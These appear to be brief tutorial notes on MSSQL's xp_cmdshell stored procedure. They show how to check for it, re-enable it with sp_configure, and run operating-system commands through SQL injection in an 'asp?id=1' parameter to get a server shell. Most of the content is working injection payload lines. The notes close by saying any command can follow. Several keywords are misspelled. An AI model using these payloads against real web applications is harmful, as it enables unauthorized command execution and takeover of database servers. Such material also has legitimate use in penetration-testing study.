mssql的xp_cmdshell扩展
introduction
xp_cmdshell extension : stored procedure executes command string as an operating system command in shell and retireve all output as text lines
determine if current mssql has xp_cmdshella return value of 1 indicates the extension is xp_cmdshell
code: select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
testing whether can execute system command
exec master..xp_cmdshell 'net user'
exec master.dbo.xp_cmdshell 'net user'
error
- workaround
- exec sp_configure 'show advanced options',1;
- exec sp_configure ' xp_cmdshell',1;
- reconfigure
sp_configure is a stored procedure used to modify system configurations.to modify advanced options in sytem ,the 'show advanced options' parameter must be set to 1.
a stored procedure execute command to modify advanced parameter 'xp_cmeshell' and set it to 1 that allows sqlserver execute operating sysytem cmd outside of database
using xp_cmdshell obtain server shell
1.detemine whether have xp_cmdshell
asp?id=1' and (select count(*) from master.dob.sysobjects where xtype='X' and name='xp_cmdshell') >0 -- #website common output --success
2.use xp_cmdshell execute systemcmd
asp?id=1';exec master.dbo.xp_cmdshell 'net user' --
tips: after executing a cmd,there is no normal output in browser.as long as no error,it indicates the cmd has been executed successfully.
the most vital thing is we can use any cmd after master.dbo.xp_cmdshell